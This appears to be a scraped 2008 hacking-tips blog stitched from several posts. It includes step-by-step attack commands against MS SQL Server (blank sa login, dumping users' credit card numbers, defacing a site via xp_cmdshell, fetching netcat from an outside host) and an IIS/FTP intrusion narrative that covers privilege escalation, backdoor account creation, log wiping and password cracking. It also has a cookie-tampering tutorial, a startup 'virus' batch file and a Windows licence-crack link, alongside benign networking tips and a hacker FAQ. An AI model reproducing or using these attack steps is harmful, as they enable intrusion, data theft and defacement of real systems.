And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

And

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:
Username creditcard expdate ----------- ------------ ---------- Jack 5935023473209871 2004-10-03 00:00:00.000 Jill 5839203921948323 2004-07-02 00:00:00.000 Micheal 5732009850338493 2004-08-07 00:00:00.000 Ronak 5738203981300410 2004-03-02 00:00:00.000
Write something in index.html file ?

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”

Wanna upload any file on the remote system.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Precautionay measures
---------------------------
<*> Change the default password for sa. <*> Delete all the default stored procedures. <*> Filter out all the characters like ,",--,:,etc. <*> Keep upto date with patches <*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites like

http://neworder.box.sk/redirect.php?http://sqlsecurity.com
http://neworder.box.sk/redirect.php?http://www.cert.com

credits:-not known

Networking commands

2008-10-12T21:33:00.004+05:30
Here are some cool networking commands:-

isplay Connection Configuration: ipconfig /all

Display DNS Cache Info Configuration: ipconfig /displaydns

Clear DNS Cache: ipconfig /flushdns

Release All IP Address Connections: ipconfig /release

Renew All IP Address Connections: ipconfig /renew

Re-Register the DNS connections: ipconfig /registerdns

Display DHCP Class Information: ipconfig /showclassid

Change/Modify DHCP Class ID: ipconfig /setclassid

Network Connections: control netconnections

Network Setup Wizard: netsetup.cpl

Test Connectivity: ping http://www.yahoo.com/

Trace IP address Route: tracert

Displays the TCP/IP protocol sessions: netstat

Display Local Route: route

Display Resolved MAC Addresses: arp

Display Name of Computer Currently on: hostname

Real Tricks -1

2008-10-12T21:21:00.011+05:30
note:-these tricks are collected over net.well i don't guarantee you that all tricks will work.use the tricks at your own risk.

here r some real trick for u all
Disable The Send Error Report, to Microsoft
To disable the stupid feature in WinXP which
tries to send a report to microsoft every time
a program crashes, you will have to do this:

******************************************

Open Control Panel

Click on System.
Click on Performance and Maintenance.
Then click on the Advanced tab
Click on the error reporting button on
the bottom of the windows.
Select Disable error reporting.
Click OK
Click OK

check validation

type oobe/msoobe /a in run

"Add_Licence_To_Your_Windows.reg" form

http://www.filelime.com/upload/files/Add_Licence_To_Your_Windows.reg

delete virus
delete virus
You have to use an anti virus to detect a virus
or worm.That will delete your virus if it can
do that.Otherwise you may try another tricks
to delete any infectious file.Open nero burning
rom,explore your drives and just drag suspecting
files with extension .bat,.inp (may be .exe,.cpp,.dat etc)
to desctop.Now delete manually from desctop.

How to Disable or enable autoplay.
How to Disable or enable autoplay.
Type in run "gpedit.msc"(without "")-> computer
configuration->Administrative Template->Ststem->
Yurn autoplay on/off

change d start button
change d start button
First you have to download a tool resource
hacker from website http://rpi.net.au/ajohnson/
resourcehacker. Now open reshacker.exe and open
file menu. Go to c:\windows and open explorer.
exe. Now click on the string table on the left
hand side and then select 37 and then 1033. You
will see “start” on the right hand side of the
screen. Now you can delete the letters start
but only under “ “ . Suppose you name it
“Techno India”. Then click on the compile script
button. Save this file as say “newexplorer.exe”
in windows. Now start registry editor by
typing regdit in run window. Go to key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon. Select shell ,
right click it and select modify , and then
write the new version of explorer.exe i.e.
newexplorer.exe. This will load modified version
of explorer.exe when system boots. Restart
the system and find the effect.

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

Change XP Boot Screen
Change XP Boot Screen
If you would like to change your boot up screen follow the directions below. These instructions assume that you have a place to download the boot screen from the net. If you would like to download a boot screen, visit http://www.themexp.org

1. Backup (copy) the file %windir%\system32\ntoskrnl.exe (most likely C:\windows\system32\ntoskrnl.exe - the boot screen)
2. Download the .zip to your computer (important: make sure to get the right version, XP or XP SP1)
3. Extract ntoskrnl.exe to a directory other than %windir%\system32 (most likely C:\windows\system32)
4. Reboot your computer into Safe Mode (hit F8 before the boot screen) or into true DOS (from a boot disk)
5. Overwrite the file %windir%\system32\ntoskrnl.exe (which should have been backed up) with the extracted exe
6. Reboot your computer as you normally would

Associate an icon with a drive

To set the icon of any drive (hard disk, cd rom or anything else) with a letter (C:\ etc.), run REGEDIT (Start -> Run -> regedit)

Navigate to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

If one doesn't already exist, create a new KEY called "DriveIcons". Under this key, create a new key with the letter of your drive.

I.e. C for your C:\ drive.

To change the icon for that drive, create a key inside that one called DefaultIcon and set the path of (Default) to the location of your icon

eg C\DefaultIcon\
then (Default) = D:\Documents\C Drive Icon.ico

To change the name of that drive, create a key in the drive letter one (eg C\) called DefaultLabel and set the (Default) to what you want the drive to be called.
This is useful if you want to assign a long name to the floppy drive.

Best way to Hide the Recycle Bin from the Desktop

Open Regedit & explore:

i

f you are using the XP style start menu
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\

if working with the classic menu:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu\

Inside, Make new DWORD-Value with the name "{645FF040-5081-101B-9F08-00AA002F954E}" & 'Modify' Value "1"

That will just hide the Recycle bin icon,
If a Dock is installed, by this procedure the 'Recycle bin' Docklet won't be anyhow affected as by some other Tweaks.

To restore the desktop icon again, just 'Modify' the same DWORD-Value to "0"

Real tricks-1
Real tricks-2
Real tricks-3
Real tricks-4

Windows FTP Hacking

2008-10-12T17:08:00.001+05:30
The exact methods may not work, but we aren’t here to train script kiddies, we just want to make you think.

Johnny Hacker has a Windows NT Server at home. Why? Because he knows if he’s going to hack NT he’s best using the same type of computer…it gives him all the necessary tools. He has installed RAS and has a dial-up connection to the Internet. One morning, around 2:00am he dials into the Internet…his IP address is dynamically assigned to him. He opens up a Command Prompt window and gets down to work. He knows www.company.com’s web server is running IIS. How? Because he once did a search on “batch fil es as CGI” using Excites search engine. That phrase is in Chapter 8 of Internet Information Server’s on-line help….and unfortunately it’s been indexed by Excite’s spider…now Johnny has a list of around 600 web servers running IIS.

He ftps to www.company.com. He isn’t even sure yet if the server is running the ftp service. He knows if he gets a connection refused message it wont be…he’s in luck though…the following appears on the screen:

C:\ftp www.company.com
Connected to www.company.com.
220 saturn Microsoft FTP Service (Version 3.0).
User (www.comapny.com:(none)):

This connection message tells him something extremely important : The NetBIOS name of the server : SATURN. From this he can deduce the name of the anonymous internet account that is used by NT to allow people to anonymously u se the WWW, FTP and Gopher services on the machine. If the default account hasn’t been changed, and he knows that it is very rare if it has been changed, the anonymous internet account will be called IUSR_SATURN. This information will be needed later if he’s to gain Administrator access to the machine. He enters “anonymous” as the user and the following appears:

331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

Johnny often tries the “guest” account before using “anonymous” as the user. A fresh install of NT has the “guest” account disabled but some admins enable this account….and the funny thing is they usually put a weak password on it such as ‘guest’ or no password at all. If he manages to gain access to the ftp service with this account he has a valid NT user account….everything that the “guest” account has access to…so does Johnny, and sometimes that can be almost everything. He knows he can access their site now…but there is still a long way to go yet….even at this point he still might not get access. At this point he doesn’t even supply a password…he just presses enter and gets a message stating that the Anonymous user is logged in.

First off he types “cd /c” because some admins will make the the root of the drive a virtual ftp directory and leave the default alias name : “/c”. Next he sees whether he can actually “put” any files onto the site ie. is the write permission enabled for this f tp site. He’s in luck. Next he types “dir” to see what he has access to. He chuckles to himself when he sees a directory called “CGI-BIN”. Obviously the Webmaster of the NT machine has put this here with the rest of the WWW site so he can remotely make changes to it. Johnny knows that the CGI-BIN has the “Execute” permission so if he can manage to put any program in here he can run it from his web browser. He hopes that the Webmaster hasn’t, using NTFS file-level security, cut off write access to the anonymous internet account to this directory…even though he knows there are sometimes ways round this. He changes to the CGI-BIN directory and then changes the type to I by using the command “binary”. Then he types “put cmd.exe”. He’s in luck..he gets the following response :

200 PORT command successful.
150 Opening BINARY mode data connection for CMD.EXE.
226 Transfer complete.
208144 bytes sent in 0.06 seconds (3469.07 Kbytes/sec)

Next he puts getadmin.exe and gasys.dll into the same directory. With these three files in place he doesn’t even gracefully “close” the ftp session; he just closes the Command Prompt window. With a smile on his face he leans back and lights a smoke, savouring the moment…he knows he has them…. After crunching the cigarette out in an overflowing ashtray he connects to AOL. He does this because if logging is enabled on the NT machine the IP address of AOL’s proxy server will be left and not his own…not that it really matters because soon he’ll edit the logfile and wipe all traces of his presence. Opening up the web browser he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?IUSR_SATURN

After about a fifteen second wait the following appears on his web browser:

CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers.

The headers it did return are:

Congratulations , now account IUSR_SATURN have administrator rights!

He has just made the anonymous internet account a local administrator and consequently using this account he can do pretty much what he wants to. Firstly though, he has to create an account for himself that he can use to connect to the NT server using NT Explorer and most of the Administrative tools. He can’t use the IUSR_SATURN account because he doesn’t know the randomly generated password. To create an account he enters the following URL:

cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20cnn%20news%20/add

He has just created an account called “cnn” with the password “news”. To make the account a local administrator he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?cnn

It has taken him less than ten minutes to do all of this. He disconnects from AOL and clicks on start, goes upto find and does a search for the computer www.company.com. After about a minute the computer is found, next he right clicks on the “computer” and then clicks on Explore. NT Explorer opens and after a little wait Johnny is prompted for a user-name and password. He enters “cnn” and “news”. Moments later he is connected. Admin rights for the computer www.company.com are appended to his own security access token…now he can do anything. Using User Manager for Domains he can retrieve all the account information; he can connect to the Internet Service Manager; he can view Server Manager…first though, using NT Explorer he maps a drive to the hidden system share C$. He changes to the Winnt\system32\logfiles directory and opens up the logfile for that day. He deletes all of the log entries pertaining to his “visit” and saves it. If he gets any message about sharing violations all he has to do is change the date on the computer with the following URL:

http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98

Next, using the Registry Editor he connects to the registry on the remote computer. Then using L0phtcrack he dumps the SAM (the Security Accounts Manager - holds account info) on the NT server and begins cracking all the passwords on the machine. Using the Task Manager he sets the priority to Low because L0phtcrack is fairly processor intensive (NB L0phtcrack ver 2.0 sets the priority to Low anyway) and there is still a few thing he must do to hide the fact that that some-one has gained entry. He deletes cmd.exe, getadmin.exe and gasys.dll from the cgi-bin, then he checks the security event log for the remote NT server using Event Viewer to see if he’s left any traces there.

Finally using User Manager for Domains he removes admin rights from the IUSR_SATURN account and deletes the cnn account he created a few moments earlier. He doesn’t need this account anymore….L0phtcrack will be able to brute force all the accounts. Next time he connects to this machine it will be using the Administrator account. He breaks his connection to the Internet and sets L0phtcrack’s priority to High, leaves it running and heads to bed…Looking at his alarm clock : it’s just passed 2:30am….Sighing to himself, he mumbles, “Sheesh, I’m getting slow!” and falls asleep with a grin on his face.

The original filename was ntremote.txt - Author Unknown

Javascrit injections

2008-10-12T16:45:00.001+05:30
Today I have brought for you another type of exploit of browser that is Javascript Injection. Javascript injection is a nifty little technique that allows you to alter a sites contents without actually leaving the site. This can be very usefull when say, you need to spoof the server by editing some form options. Examples will be explained throughout.

Injection Basics

Javascript injections are run from the URL bar of the page you are visiting. To use them, you must first completly empty the URL from the URL bar. That means no http:// or whatever.

Javascript is run from the URL bar by using the javascript: protocol. In this tutorial I will only teach you the bare bones of using this, but if you are a Javascript guru, you can expand on this using plain old javascript.

The two commands covered in this tutorial are the alert(); and void(); commands. These are pretty much all you will need in most situations. For your first javascript, you will make a simple window appear, first go to any website and then type the following into your URL bar:

javascript:alert('Hello, World');

You should get a little dialog box that says "Hello, World". This will be altered later to have more practical uses.

You can also have more than one command run at the same time:

javascript:alert('Hello'); alert('World');

This would pop up a box that said 'Hello' and than another that says 'World'.

Cookie Editing

First off, check to see if the site you are visiting has set any cookies by using this script:

javascript:alert(document.cookie);

This will pop up any information stored in the sites cookies. To edit any information, we make use of the void(); command.

javascript:void(document.cookie="Field = myValue");

Would either make the field "authorized" or edit it to say "yes"... now wheter or not this does anything of value depends on the site you are injecting it on.

It is also useful to tack an alert(document.cookie); at the end of the same line to see what effect your altering had.

Form Editing

Sometimes, to edit values sent to a given website through a form, you can simply download that html and edit it slightly to allow you to submit what you want. However, sometimes the website checks to see if you actually submitted it from the website you were supposed to. To get around this, we can just edit the form straight from javascript. Note: The changes are only temporary, so it's no tuse trying to deface a site through javascript injection like this.

Every form on a given webpage (unless named otherwise) is stored in the forms[x] array... where "x" is the number, in order from top to bottom, of all the forms in a page. Note that the forms start at 0, so the first form on the page would actually be 0, and the second would be 1 and so on. Lets take this example:

Note:Since this is the first form on the page, it is forms[0]

Say this form was used to email, say vital server information to the admin of the website. You can't just download the script and edit it because the submit.php page looks for a referer. You can check to see what value a certain form element has by using this script:

javascript:alert(document.forms[0].to.value)

This is similar to the alert(document.cookie); discussed previously. In this case, It would pop up an alert that says "admin@website.com"

So here's how to Inject your email into it. You can use pretty much the same technique as the cookies editing shown earlier:

javascript:void(document.forms[0].to.value="email@nhacks.com")

This would change the email of the form to be "email@nhacks.com". Then you could use the alert(); script shown above to check your work. Or you can couple both of these commands on one line.

credits:unknown

All About FTP

2008-10-12T16:27:00.004+05:30
FTP
Index of this post

About FTP
Windows FTP
Unix FTP
FTP commands
Technical Support

About FTP

FTP is short for File Transfer Protocol,And here is the rest of it. this page contains additional information about the FTP command and help using that command in Unix and MS-DOS (Windows). See our FTP section in our dictionary for a complete definition on FTP.

Windows FTP

From the MS-DOS prompt or shell type in FTP, once typed in you will have access to the FTP command line. In this command line type:

open ftp.address.domain

Where address is the name of the server and the domain is the domain such as .COM, .NET... In addition, the IP address can be typed in, such as 255.255.255.0.

Once connected you will be asked for a username and password; if done successfully, you will have access to transfer files between computers.

Unix FTP

Unix FTP is used much like Windows; from a command prompt or shell, type in FTP, from FTP you should be able to log into a server, providing you have the proper access.

FTP Commands

Depending upon the version of FTP and the operating system being used, each of the below commands may or may not work. Generally typing -help or a ? will list the commands available to you.

Command
Information
! Using this command you will have the capability of toggling back and forth between the operating system and ftp. Once back in the operating system generally typing exit will take you back to the FTP command line.
? Access the Help screen.
abor Abort Transfer
append Append text to a local file.
ascii Switch to ASCII transfer mode
bell Turns bell mode on / off.
binary Switches to binary transfer mode.
bye Exits from FTP.
cd Changes directory.
cdup Change to parent directory on remote system
close Exits from FTP.
cwd Change working directory on remote system
dele Delete file on remote system
delete Deletes a file.
debug Sets debugging on / off.
dir Lists files if connected.

dir -C = Will list the files in wide format.
dir -1 = Lists the files in bare format in alphabetic order
dir -r = Lists directory in reverse alphabetic order.
dir -R = Lists all files in current directory and sub directories.
dir -S = Lists files in bare format in alphabetic order.
disconnect Exits from FTP.
get Get file from the computer connected to.
glob Sets globbing on / off.
hash Sets hash mark printing on / off
help Access the Help screen and displays information about command if command typed after help.
lcd Displays local directory or if path typed after lcd will change local directory.
list Send a list of file names in the current directory on the remote system on the data connection.
literal Sends command line
ls Lists files if connected.
mdelete Multiple delete
mdir Lists contents of multiple remote directories
mget Get multiple files
mkd Make directory.
mkdir Make directory.
mls Lists contents of multiple remote directories.
mode Specifies the transfer mode. Available parameters are generally S, B or C.
mput Sent multiple files
nlst Send a full directory listing of the current directory on the remote system on the data connection.
open Opens address.
pass Supplies a user password.
port Specify the client port number.
prompt Enables/disables prompt.
put Send one file
pwd Print working directory
quit Exits from FTP.
quote Send arbitrary ftp command
recv Receive file
retr Get file from remote system.
remotehelp Get help from remote server
rename Renames a file
rmdir Removes a directory
send Send single file
status Shows status of currently enabled / disabled options
trace Toggles packet tracing
type Set file transfer type
user Send new user information
verbose Sets verbose on / off.

TECHNICAL SUPPORT

How do I send and receive files once connected in MS-DOS FTP?

To get files from the server and place them in your current working directory, on the machine you are working, type:

get myfile.htm

Where myfile.htm is the name of the file you wish to get from the computer connected to.

To send a file from your computer to the computer you are connected to (providing you have proper rights and the file exists in the current working directory), type:

send myfile.htm

Where myfile.htm is the name of the file that exists in the current directory; if you cannot recall the name of the file, use the ! command to temporally get back to a MS-DOS prompt; once you have located the file name, type exit to get back to the location you left in FTP.

In MS-DOS FTP I am only able to send files in the directory that I typed FTP in.

Set the LCD, for example, if you want to send files that are in the C:\Windows directory, type:

LCD c:\windows

How do I download multiple files from an FTP server?

Use the mget command, which is short for multiple get. Using the mget command you can get multiple files by using wildcards. For example, " mget *.* " would get all files in the current directory.

By default, prompting would be enabled; if you wish to get all files without being prompted, use the "prompt" command to disable/enable prompting.

When attempting to connect to an FTP address, receiving "10061" error

This error is caused when the server is refusing the connection.

Attempt to connect to an alternate FTP address.

If you are able to connect to other FTP addresses, it is likely the site generating the error 10061 is refusing to accept your connection because of security privileges or because it is not an FTP server.

If you are unable to connect to any address, it is likely an issue with the network or computer configuration.

1. Ensure that the network configuration settings are properly setup as well as FTP rights.
2. Verify that the firewall is properly setup to accept FTP access.

How to create a Windows FTP script

Create a text document with commands used when in FTP. Below is an example of what such a script may look like:

open ftp.domain.com
username
password
cd public_html
dir
get file.txt
bye

The above script will log into the ftp site ftp.domain.com. Once connected, it will enter the username and then the password (substitute username for your username and password for your password). Once logged in, the script then goes into the public_html directory, gets a directory listing and then uses the get command to get the file called file.txt. Once the file is received, it logs off using the bye command.

Once the script file has been created, for example, if it was called script.txt, to execute this script with ftp you would type:

ftp -s:script.txt

credits:-unknown

Q:	How do I tell if I am already a hacker?
A:	Ask yourself the following three questions: · Do you speak code, fluently? · Do you identify with the goals and values of the hacker community? · Has a well-established member of the hacker community ever called you a hacker? If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient. The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project. The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That's the inward half; the other, outward half is the degree to which you identify with the hacker community's long-term projects. Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place? But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off "intellectual-property" power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we've learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they've missed the point. The right response is probably “Shut up and show them the code.” The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts. Sociologists, who study networks like those of the hacker culture under the general rubric of "invisible colleges", have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the "invisible college" that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.
Q:	Will you teach me how to hack?
A:	Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects, and working as an open-source advocate, take up 110% of my time. Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know. Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions. If you do email a hacker asking for advice, here are two things to know up front. First, we've found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you'll probably be ignored. Secondly, don't dare ask for a reply to an ISP account that's different from the account you're sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.
Q:	How can I get started, then?
A:	The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.
Q:	When do you have to start? Is it too late for me to learn?
A:	Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.
Q:	How long will it take me to learn to hack?
A:	That depends on how talented you are and how hard you work at it. Most people who try can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; in hacking (as in many other fields) it takes about ten years to achieve mastery. And if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.
Q:	Is Visual Basic a good language to start with?
A:	If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn't kidding. Don't go there. It's ugly, and it never stops being ugly. There is a specific problem with Visual Basic; mainly that it's not portable. Though there is a prototype open-source implementations of Visual Basic, the applicable ECMA standards don't cover more than a small set of its programming interfaces. On Windows most of its library support is proprietary to a single vendor (Microsoft); if you aren't extremely careful about which features you use — more careful than any newbie is really capable of being — you'll end up locked into only those platforms Microsoft chooses to support. If you're starting on a Unix, much better languages with better libraries are available. Python, for example. Also, like other Basics, Visual Basic is a poorly-designed language that will teach you bad programming habits. No, don't ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead. One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't fully supported under at least Linux or one of the BSDs, and/or at least three different vendors' operating systems, is a poor one to learn to hack in.
Q:	Would you help me to crack a system, or teach me how to crack?
A:	No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.
Q:	How can I get the password for someone else's account?
A:	This is cracking. Go away, idiot.
Q:	How can I break into/read/monitor someone else's email?
A:	This is cracking. Get lost, moron.
Q:	How can I steal channel op privileges on IRC?
A:	This is cracking. Begone, cretin.
Q:	I've been cracked. Will you help me fend off further attacks?
A:	No. Every time I've been asked this question so far, it's been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.
Q:	I'm having problems with my Windows software. Will you help me?
A:	Yes. Go to a DOS prompt and type "format c:". Any problems you are experiencing will cease within a few minutes.
Q:	Where can I find some real hackers to talk with?
A:	The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio). (I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)
Q:	Can you recommend useful books about hacking-related subjects?
A:	I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting. For an introduction to Python, see the introductory materials on the Python site.
Q:	Do I need to be good at math to become a hacker?
A:	No. Hacking uses very little formal mathematics or arithmetic. In particular, you won't usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful. Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won't help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you'd better grow it. I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan's book What Is The Name Of This Book?. Smullyan's playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.
Q:	What language should I learn first?
A:	XHTML (the latest dialect of HTML) if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide. But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed. C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first. Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.
Q:	What kind of hardware do I need?
A:	It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker's learning process. This stopped being true in the mid-1990s; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough. The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for almost all modern machines. The only really sticky areas are modems and wireless cards; some machines have Windows-specific hardware that won't work with Linux. There's a FAQ on hardware compatibility; the latest version is here.
Q:	I want to contribute. Can you help me pick a problem to work on?
A:	No, because I don't know your talents or interests. You have to be self-motivated or you won't stick, which is why having other people choose your direction almost never works. Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think "Cool! I'd like to work on that!", join it.
Q:	Do I need to hate and bash Microsoft?
A:	No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.
Q:	But won't open-source software leave programmers unable to make a living?
A:	This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.
Q:	Where can I get a free Unix?
A:	If you don't have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now...